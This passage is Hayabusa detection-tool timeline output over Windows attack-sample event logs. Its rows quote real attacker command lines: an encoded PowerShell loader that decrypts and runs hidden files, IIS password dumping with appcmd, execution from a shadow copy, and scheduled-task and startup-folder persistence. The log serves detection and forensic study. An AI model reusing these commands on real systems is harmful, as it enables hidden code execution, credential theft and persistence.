JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1004 | PGUID: 365ABB72-3D70-5CEB-0000-001032EAFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:20.555 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". )"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 4012 | PGUID: 365ABB72-3D70-5CEB-0000-0010F2EDFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-28 00:12:38.241 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c whoami /groups | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 3256 | PGUID: 365ABB72-FE66-5CEB-0000-001058F50B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:38.290 +09:00,IEWIN7,1,info,,Process Created,Cmd: whoami /groups | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c whoami /groups | LID: 0x3e7 | PID: 1168 | PGUID: 365ABB72-FE66-5CEB-0000-0010C7F80B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:38.290 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:38.290 +09:00,IEWIN7,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:38.290 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:43.990 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 1536 | PGUID: 365ABB72-FE6B-5CEB-0000-00102A090C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:44.055 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state | LID: 0x3e7 | PID: 3520 | PGUID: 365ABB72-FE6C-5CEB-0000-0010050C0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:44.055 +09:00,IEWIN7,1,medium,Exec,WMI Reconnaissance List Remote Services,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmic_remote_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:45.405 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 3876 | PGUID: 365ABB72-FE6D-5CEB-0000-0010332A0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:45.491 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state | LID: 0x3e7 | PID: 1636 | PGUID: 365ABB72-FE6D-5CEB-0000-0010122D0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:45.491 +09:00,IEWIN7,1,medium,Exec,WMI Reconnaissance List Remote Services,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmic_remote_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:46.981 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\Temp\svhost64.exe | Process: C:\Windows\System32\notepad.exe | PID: 1944 | PGUID: 365ABB72-FD85-5CEB-0000-00104C0E0B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:47.402 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 3448 | PGUID: 365ABB72-FE6F-5CEB-0000-0010F4370C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:47.478 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" | LID: 0x3e7 | PID: 3344 | PGUID: 365ABB72-FE6F-5CEB-0000-0010D33A0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:47.478 +09:00,IEWIN7,1,medium,CredAccess,Shadow Copies Creation Using Operating Systems Utilities,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:48.655 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 2412 | PGUID: 365ABB72-FE70-5CEB-0000-0010385C0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:48.763 +09:00,IEWIN7,1,info,,Process Created,"Cmd: vssadmin List Shadows | Process: C:\Windows\System32\vssadmin.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" | LID: 0x3e7 | PID: 1820 | PGUID: 365ABB72-FE70-5CEB-0000-0010935F0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:48.827 +09:00,IEWIN7,1,info,,Process Created,"Cmd: find ""Shadow Copy Volume"" | Process: C:\Windows\System32\find.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" | LID: 0x3e7 | PID: 1796 | PGUID: 365ABB72-FE70-5CEB-0000-0010D65F0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:54.447 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 2356 | PGUID: 365ABB72-FE76-5CEB-0000-0010546E0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:54.544 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | LID: 0x3e7 | PID: 2840 | PGUID: 365ABB72-FE76-5CEB-0000-001077710C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,CredAccess,Shadow Copies Creation Using Operating Systems Utilities,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Exec,Suspicious WMI Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_wmi_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:54.632 +09:00,IEWIN7,1,info,,Process Created,Cmd: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | Process: \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x3e7 | PID: 1260 | PGUID: 365ABB72-FE76-5CEB-0000-001015780C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:54.632 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:59.519 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 4012 | PGUID: 365ABB72-FE7B-5CEB-0000-0010867F0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:59.578 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" | Process: C:\Windows\System32\schtasks.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" | LID: 0x3e7 | PID: 4044 | PGUID: 365ABB72-FE7B-5CEB-0000-0010D6820C00 | Hash: SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 11:13:52.171 +09:00,IEWIN7,1,info,,Process Created,"Cmd: vshadow.exe -nw -exec=c:\windows\System32\osk.exe c:\ | Process: C:\ProgramData\vshadow.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14a73 | PID: 2432 | PGUID: 365ABB72-9960-5CEC-0000-0010B6981600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx 2019-05-28 11:13:52.429 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Process Launched via DCOM | Cmd: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot11"" """" """" ""6350c17eb"" ""00000000"" ""000005AC"" ""00000590"" | Process: C:\Windows\System32\drvinst.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1968 | PGUID: 365ABB72-9960-5CEC-0000-001082AD1600 | Hash: SHA1=2D42A8EABA2829A1641FC580DA5E337C75997A99,MD5=44DAF0A410AB80E7CAB7C12EDE5FFB34,SHA256=3493630EE740508D0DB760A7648470F2987752D9B205CCCA805A66C3524E2B58,IMPHASH=ED4425CF217058DA6BDF611263E571DD",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx 2019-05-28 11:13:53.507 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: IEWIN7\IEUser | Parent Cmd: utilman.exe /debug | LID: 0x14a73 | PID: 2600 | PGUID: 365ABB72-9961-5CEC-0000-0010E1161700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx 2019-05-28 11:14:48.819 +09:00,IEWIN7,1,info,,Process Created,"Cmd: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\ | Process: C:\ProgramData\vshadow.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14a73 | PID: 3092 | PGUID: 365ABB72-9998-5CEC-0000-00107D501700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx 2019-05-28 11:14:49.194 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Process Launched via DCOM | Cmd: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot12"" """" """" ""6d110b0a3"" ""00000000"" ""000005B8"" ""000004B0"" | Process: C:\Windows\System32\drvinst.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1128 | PGUID: 365ABB72-9999-5CEC-0000-0010EB5A1700 | Hash: SHA1=2D42A8EABA2829A1641FC580DA5E337C75997A99,MD5=44DAF0A410AB80E7CAB7C12EDE5FFB34,SHA256=3493630EE740508D0DB760A7648470F2987752D9B205CCCA805A66C3524E2B58,IMPHASH=ED4425CF217058DA6BDF611263E571DD",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx 2019-05-28 11:14:50.413 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\windows\System32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\ | LID: 0x14a73 | PID: 1516 | PGUID: 365ABB72-999A-5CEC-0000-0010C3A11700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx 2019-05-29 08:09:38.589 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Startup User Shell Folder Modified | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\startup: c:\programdata\StartupNewHomeAddress | Process: C:\Windows\system32\reg.exe | PID: 1520 | PGUID: 